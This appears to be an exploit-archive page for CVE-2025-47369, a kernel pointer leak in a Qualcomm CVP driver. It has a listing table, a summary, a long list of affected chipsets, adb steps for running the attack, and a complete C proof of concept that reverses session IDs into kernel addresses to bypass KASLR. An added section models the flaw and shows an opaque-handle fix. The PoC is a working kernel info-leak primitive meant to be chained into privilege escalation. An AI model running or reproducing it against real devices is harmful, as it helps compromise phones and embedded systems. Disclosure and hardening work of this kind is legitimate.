| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2025-47369 | 7 Jan 2026 00:39 | – | circl |
| Qualcomm Chipsets Security Vulnerability | 7 Jan 2026 00:00 | – | cnnvd |
| CVE-2025-47369 | 6 Jan 2026 22:48 | – | cve |
| CVE-2025-47369 Information Exposure in Computer Vision | 6 Jan 2026 22:48 | – | cvelist |
| EUVD-2026-1259 | 7 Jan 2026 12:31 | – | euvd |
| CVE-2025-47369 | 7 Jan 2026 12:17 | – | nvd |
| Qualcomm CVP Kernel Driver Pointer Disclosure / Privilege Escalation | 17 Feb 2026 00:00 | – | packetstorm |
| PT-2026-1540 | 6 Jan 2026 00:00 | – | ptsecurity |
| CVE-2025-47369 | 8 Jan 2026 03:14 | – | redhatcve |
| CVE-2025-47369 Information Exposure in Computer Vision | 6 Jan 2026 22:48 | – | vulnrichment |
=============================================================================================================================================
| # Title : Kernel Pointer Leak via CVP Driver |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213733/ & CVE-2025-47369
[+] Summary : The Qualcomm CVP driver exposes kernel pointers to userland by returning a "hashed" session ID derived from a kernel pointer using hash32_ptr().
This function is not a cryptographic hash but a reversible fold that XORs the upper and lower 32 bits of the pointer.
Due to the predictable ARM64 kernel virtual address layout and alignment constraints, the session ID can be deterministically "unfolded" to recover the original kernel pointer.
This design flaw results in a reliable kernel pointer leak, effectively bypassing KASLR and providing a strong info-leak primitive that can be chained with other vulnerabilities.
The issue is tracked as CVE-2025-47369 and stems from improper use of pointer-derived identifiers rather than an implementation bug.
[+] Affected Chipsets : AR8035, AR9380, CSR8811, FastConnect 6200, FastConnect 6700, FastConnect 6900, FastConnect 7800, Immersive Home 214 Platform,
Immersive Home 216 Platform, Immersive Home 316 Platform, Immersive Home 318 Platform, IPQ4018, IPQ4019, IPQ4028, IPQ4029, IPQ5010,
IPQ5028, IPQ6000, IPQ6010, IPQ6018, IPQ6028, IPQ8064, IPQ8065, IPQ8068, IPQ8070, IPQ8070A, IPQ8071, IPQ8071A, IPQ8072, IPQ8072A,
IPQ8074, IPQ8074A, IPQ8076, IPQ8076A, IPQ8078, IPQ8078A, IPQ8173, IPQ8174, QAM8255P, QAM8295P, QAM8620P, QAM8650P, QAM8775P, QAMSRV1H,
QAMSRV1M, QCA4024, QCA6174A, QCA6428, QCA6438, QCA6574, QCA6574A, QCA6574AU, QCA6584AU, QCA6595, QCA6595AU, QCA6678AQ, QCA6688AQ,
QCA6696, QCA6698AQ, QCA6797AQ, QCA7500, QCA8075, QCA8081, QCA8337, QCA9880, QCA9886, QCA9888, QCA9889, QCA9898, QCA9980, QCA9984,
QCA9985, QCA9986, QCA9990, QCA9992, QCA9994, QCC710, QCM5430, QCM6490, QCN5022, QCN5024, QCN5052, QCN5122, QCN5124, QCN5152, QCN5154,
QCN5164, QCN6023, QCN6024, QCN6112, QCN6122, QCN6132, QCN6224, QCN6274, QCN9000, QCN9022, QCN9024, QCN9070, QCN9072, QCN9074, QCN9100,
QCN9274, QCS5430, QCS615, QCS6490, QCS9100, QEP8111, QFW7114, QFW7124, QMP1000, Qualcomm Video Collaboration VC3 Platform, SA6145P,
SA6150P, SA6155P, SA7255P, SA7775P, SA8145P, SA8150P, SA8155P, SA8195P, SA8255P, SA8295P, SA8540P, SA8620P, SA8650P, SA8770P, SA8775P,
SA9000P, SC8380XP, SDX55, SM4635, SM6475, SM6650, SM6650P, SM7435, SM7635, SM7635P, SM7675, SM7675P, SM8635, SM8635P, SM8650Q, SM8735,
SM8750, SM8750P, Snapdragon 4 Gen 2 Mobile Platform, Snapdragon 6 Gen 1 Mobile Platform, Snapdragon 8 Gen 3 Mobile Platform, Snapdragon
AR1 Gen 1 Platform, Snapdragon AR1 Gen 1 Platform "Luna1", Snapdragon Auto 5G Modem-RF Gen 2, Snapdragon X32 5G Modem-RF System,
Snapdragon X35 5G Modem-RF System, Snapdragon X72 5G Modem-RF System, Snapdragon X75 5G Modem-RF System, SRV1H, SRV1L, SRV1M, SXR2330P,
SXR2350P, WCD9340, WCD9370, WCD9375, WCD9378, WCD9380, WCD9385, WCD9390, WCD9395,
WCN3950, WCN3988, WCN6650, WCN6755, WCN7750, WCN7860, WCN7861, WCN7880, WCN7881,
WSA8810, WSA8815, WSA8830, WSA8832, WSA8835, WSA8840, WSA8845, WSA8845H
[+] Usage :
# 1. Compile the POC : gcc -o cvp_exploit cvp_exploit.c -static
# 2. Upload the file to the device : adb push cvp_exploit /data/local/tmp/
# 3. Run the exploit :
```sh
adb shell
cd /data/local/tmp
chmod +x cvp_exploit
./cvp_exploit
```
[+] POC :
```c
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <stdint.h>

/* Argument types and control codes passed to the CVP driver's ioctl */
#define EVA_KMD_SESSION_CONTROL  1
#define EVA_KMD_GET_SESSION_INFO 2
#define SESSION_CREATE           1

struct session_ctrl_data {
    int ctrl_type;
};

struct session_info_data {
    unsigned int session_id;
};

struct eva_kmd_arg {
    int type;
    union {
        struct session_ctrl_data session_ctrl;
        struct session_info_data session;
    } data;
};

/* Reverse the hash32_ptr() fold (upper 32 bits XOR lower 32 bits).
 * Assumes the upper half is 0xffffff8X (ARM64 kernel VA) and the object is
 * 16-byte aligned, so the low nibble of the id equals that of the upper half. */
unsigned long unfold_pointer(unsigned int session_id) {
    unsigned char bottom_byte = (session_id & 0xf) | 0x80;
    unsigned long top_half = 0xffffff00UL | bottom_byte;
    unsigned long bottom_half = session_id ^ (top_half & 0xffffffff);
    unsigned long kernel_ptr = (top_half << 32) | bottom_half;
    return kernel_ptr;
}

/* Plausibility check: top bit set, or top 24 bits all ones */
int is_valid_kernel_pointer(unsigned long ptr) {
    if ((ptr >> 63) == 1) {
        return 1;
    }
    if ((ptr >> 40) == 0xffffff) {  /* original shifted by 48, which can never equal 0xffffff */
        return 1;
    }
    return 0;
}

int main(void) {
    printf("CVE-2025-47369 POC - Kernel Pointer Leak via CVP Driver by indoushka\n");
    printf("=====================================================================\n");

    int fd = open("/dev/cvp", O_RDWR);
    if (fd == -1) {
        perror("Failed to open /dev/cvp");
        printf("Make sure device exists and permissions are correct\n");
        return EXIT_FAILURE;
    }
    printf("[+] Opened /dev/cvp (fd=%d)\n", fd);

    int num_sessions = 3;
    unsigned long pointers[num_sessions];

    for (int i = 0; i < num_sessions; i++) {
        /* Create a session: the driver allocates a kernel object for it */
        struct eva_kmd_arg create_arg = {
            .type = EVA_KMD_SESSION_CONTROL,
            .data.session_ctrl.ctrl_type = SESSION_CREATE,
        };
        if (ioctl(fd, 0, &create_arg) < 0) {
            perror("Failed to create session");
            close(fd);
            return EXIT_FAILURE;
        }

        /* Ask for the session id, which is hash32_ptr() of that object */
        struct eva_kmd_arg info_arg = {
            .type = EVA_KMD_GET_SESSION_INFO,
            .data.session.session_id = 0
        };
        if (ioctl(fd, 0, &info_arg) < 0) {
            perror("Failed to get session info");
            close(fd);
            return EXIT_FAILURE;
        }

        unsigned int session_id = info_arg.data.session.session_id;
        printf("[+] Session %d created - session_id: 0x%08x\n", i + 1, session_id);

        unsigned long kernel_ptr = unfold_pointer(session_id);
        pointers[i] = kernel_ptr;

        if (is_valid_kernel_pointer(kernel_ptr)) {
            printf("    [+] Leaked kernel pointer: 0x%016lx\n", kernel_ptr);
            printf("    [+] Pointer analysis:\n");
            printf("        - Upper 32 bits: 0x%08lx\n", kernel_ptr >> 32);
            printf("        - Lower 32 bits: 0x%08lx\n", kernel_ptr & 0xffffffff);
            /* Re-folding the recovered pointer must give back the session id */
            printf("        - XOR result: 0x%08x\n",
                   (unsigned int)((kernel_ptr >> 32) ^ (kernel_ptr & 0xffffffff)));
        } else {
            printf("    [-] Invalid/unexpected pointer format: 0x%016lx\n", kernel_ptr);
        }
        printf("\n");
    }

    /* Distance between consecutive session objects */
    printf("[+] Pattern Analysis:\n");
    for (int i = 1; i < num_sessions; i++) {
        long diff = (long)(pointers[i] - pointers[i - 1]);
        printf("    Difference between session %d and %d: %ld bytes (0x%lx)\n",
               i + 1, i, diff, (unsigned long)diff);
    }

    printf("\n[+] System Information:\n");
    printf("    Pointer size: %zu bits\n", sizeof(void *) * 8);
    printf("    Long size: %zu bits\n", sizeof(unsigned long) * 8);

    close(fd);
    printf("[+] Exploit completed successfully\n");
    return EXIT_SUCCESS;
}
```
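The following is an added example written for this page, not code from the advisory, the PoC above, or Qualcomm's driver. It models the hash32_ptr() fold described in the summary in userland, checks under which assumptions the PoC's unfolding recovers the full address, and places beside it the pattern that removes the leak: handing out table indices as session IDs so the returned value carries no address bits. All addresses are constructed, and session_table, alloc_opaque_id and lookup_opaque_id are hypothetical names, not the driver's.

```c
/* Added example: hash32_ptr()-style fold vs. an opaque handle table.
 * Not part of the original PoC; all addresses below are constructed. */
#include <stdint.h>
#include <stdio.h>

/* Mirror of the 64-bit hash32_ptr() fold: XOR of the upper and lower 32 bits.
 * Anyone who knows (or can guess) the upper half recovers the lower half. */
static uint32_t fold_ptr(uint64_t ptr) {
    return (uint32_t)(ptr ^ (ptr >> 32));
}

/* Same recovery as the PoC's unfold_pointer(): assumes the upper half is
 * 0xffffff8X (ARM64 kernel VA) and the object is 16-byte aligned, so the
 * id's low nibble is the upper half's low nibble. */
static uint64_t unfold_ptr(uint32_t id) {
    uint64_t top = 0xffffff80ULL | (id & 0xfULL);
    uint64_t bottom = (uint64_t)id ^ top;   /* top < 2^32, so no masking needed */
    return (top << 32) | bottom;
}

/* 1 if the fold leaks the whole pointer under those assumptions, 0 otherwise */
static int fold_is_reversible(uint64_t ptr) {
    return unfold_ptr(fold_ptr(ptr)) == ptr;
}

/* Hardened pattern (hypothetical names): session ids are small indices into a
 * per-file table; the id says nothing about where the object lives. In the
 * kernel this is what idr/xarray-allocated handles give you. */
#define MAX_SESSIONS 8
struct session_table {
    uint64_t objects[MAX_SESSIONS];  /* object addresses stay kernel-side */
    uint32_t next_id;                /* ids start at 1; 0 means "none" */
};

static void session_table_init(struct session_table *t) {
    *t = (struct session_table){0};
    t->next_id = 1;
}

static uint32_t alloc_opaque_id(struct session_table *t, uint64_t obj) {
    if (t->next_id >= MAX_SESSIONS) return 0;      /* table full */
    uint32_t id = t->next_id++;
    t->objects[id] = obj;
    return id;
}

static uint64_t lookup_opaque_id(const struct session_table *t, uint32_t id) {
    if (id == 0 || id >= t->next_id) return 0;     /* reject unknown handles */
    return t->objects[id];
}

int main(void) {
    /* Constructed ARM64-style kernel addresses: first 16-byte aligned, second not */
    uint64_t aligned = 0xffffff8012345600ULL;
    uint64_t unaligned = 0xffffff8012345608ULL;

    printf("fold(%016llx) = %08x, reversible: %d\n", (unsigned long long)aligned,
           fold_ptr(aligned), fold_is_reversible(aligned));
    printf("fold(%016llx) = %08x, reversible: %d (alignment assumption broken)\n",
           (unsigned long long)unaligned, fold_ptr(unaligned), fold_is_reversible(unaligned));

    struct session_table t;
    session_table_init(&t);
    uint32_t id = alloc_opaque_id(&t, aligned);
    printf("opaque id %u -> object %016llx (id reveals no address bits)\n",
           id, (unsigned long long)lookup_opaque_id(&t, id));
    return 0;
}
```

For the aligned address the round trip is exact; for the 8-byte-aligned one the PoC's assumption fails and the recovered value differs in a few bits, but the id still contains the full XOR of both halves, so a fold-based id is not a safer hash, it is no hash at all. The fix is an opaque handle: in a real driver the index space is per open file and the lookup also verifies ownership, which is what makes the value safe to hand to userland.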
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================